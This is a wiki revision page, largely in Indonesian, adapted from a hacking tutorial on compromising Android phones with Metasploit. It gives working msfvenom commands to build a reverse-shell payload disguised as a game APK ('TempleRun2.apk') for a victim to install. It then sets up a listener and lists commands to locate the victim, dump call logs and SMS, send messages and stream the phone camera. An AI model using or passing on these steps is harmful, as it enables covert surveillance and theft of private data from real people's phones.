Difference between revisions of "MSF: Hack Call Log, SMS, Camera"

From OnnoWiki
Jump to navigation Jump to search
(Created page with "sumber: http://www.hackingarticles.in/hack-call-logs-sms-camera-remote-android-phone-using-metasploit/ 2015 we were using msfpayload and msfencode tools to perform this hac...")
 
 
(One intermediate revision by the same user not shown)
Line 1: Line 1:
 
sumber: http://www.hackingarticles.in/hack-call-logs-sms-camera-remote-android-phone-using-metasploit/
 
sumber: http://www.hackingarticles.in/hack-call-logs-sms-camera-remote-android-phone-using-metasploit/
  
 +
Membuat payload
  
  2015 we were using msfpayload and msfencode tools to perform this hack but on June 8th 2015 both msfpayload and msfencode is replaced by msfvenom tool. So simply now msfvenom is an updated combination of Msfpayload and Msfencode tool
+
  msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444 > TempleRun2.apk
  
Now by using msfvenom we will create meterpreter payload for android.
+
apk file ada di
  
Open you Kail Linux terminal and type:
+
/root/Desktop/TempleRun2.apk
  
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444 >/root/Desktop/TempleRun2.apk
+
TempleRun2.apk perlu di masukan ke smartphone korban supaya kita bisa akses
  
Now it will automatically generate the malicious but interesting to install apk files and store it to your Kali Linux desktop.
+
==Di Kali Linux==
 
 
/root/Desktop/TempleRun2.apk
 
  
Send this TempleRun2.apk file to victim mobile, as soon as they open and install it you will get access of victim android mobile.
+
Kita perlu set listener, jalankan
  
Now we have to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
+
msfconsole
  
Go to your Kali Linux terminal and type: msfconsole
+
Jalankan
  
 
  use exploit/multi/handler
 
  use exploit/multi/handler
Line 26: Line 25:
 
  exploit
 
  exploit
  
Now you are in victim android mobile from here you can do many things like:
+
Tunggu sambungan dari smartphone korban.
 +
 
 +
==Setelah tersambung ke korban==
  
To check whether victim mobile is rooted or not for this type following command:
+
Beberapa perintah menarik
  
 
  check_root
 
  check_root
 
+
    cek apakah smartphone korban di root
Check victim’s mobile exact location type:
 
  
 
  wlan_geolocate
 
  wlan_geolocate
 
+
    tampikan lokasi smartphone di Google maps
it will show the exact location of victim mobile on Google maps
 
 
 
To download victim call logs from their mobile type:
 
  
 
  dump_calllog
 
  dump_calllog
 
+
    download call log di file txt. ini akan tersimpan di
It will download and store txt file of call logs in your root directory
+
    /root/calllog_dump.txt
 
 
/root/calllog_dump.txt
 
 
 
To download sms dump type:
 
  
 
  dump_sms
 
  dump_sms
 +
    download SMS disimpan di txt file
  
it will also download and store txt file of sms dump in your root directory
+
send_sms -d “nomor tujuan” -t “berita yang ingin dikirim”
 
+
  send_sms -d 9599***847 -t hacked
To send sms from hacked android mobile phone to someone else type:
+
    kirim SMS
 
 
send_sms -d “number of the person whom you want to send sms” -t “message you want send”
 
 
 
  ex: send_sms -d 9599***847 -t hacked
 
 
 
To capture pic from victim’s mobile camera type:
 
  
 
  webcam_list
 
  webcam_list
 
+
    tampilan daftar semua webcam yang ada di smartphone korban
it will provides you a list of all webcams on the victim mobile then select from the list and type:
 
  
 
  webcam_snap 2
 
  webcam_snap 2
 +
    pilih webcam 2
  
to stream live feed from victim’s mobile camera type:
+
webcam_stream
 
+
    streaming dari webcam
webcam_stream
 
 
 
it will automatically open up a browser and you will see live feed from their camera
 
 
 
Author: Akshay Bhardwaj Security Enthusiast and Researcher, Sketch Artist and Technical writer at hackingarticles.in
 
 
 
 
 
 
 
  
  

Latest revision as of 14:13, 22 April 2022

sumber: http://www.hackingarticles.in/hack-call-logs-sms-camera-remote-android-phone-using-metasploit/

Membuat payload

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444 > TempleRun2.apk

apk file ada di

/root/Desktop/TempleRun2.apk

TempleRun2.apk perlu di masukan ke smartphone korban supaya kita bisa akses

Di Kali Linux

Kita perlu set listener, jalankan

msfconsole

Jalankan

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.102
set lport 4444
exploit

Tunggu sambungan dari smartphone korban.

Setelah tersambung ke korban

Beberapa perintah menarik

check_root
    cek apakah smartphone korban di root
wlan_geolocate
    tampikan lokasi smartphone di Google maps
dump_calllog
    download call log di file txt. ini akan tersimpan di
    /root/calllog_dump.txt
dump_sms
    download SMS disimpan di txt file
send_sms -d “nomor tujuan” -t “berita yang ingin dikirim”
send_sms -d 9599***847 -t hacked
    kirim SMS
webcam_list
    tampilan daftar semua webcam yang ada di smartphone korban
webcam_snap 2
   pilih webcam 2
webcam_stream
   streaming dari webcam


Referensi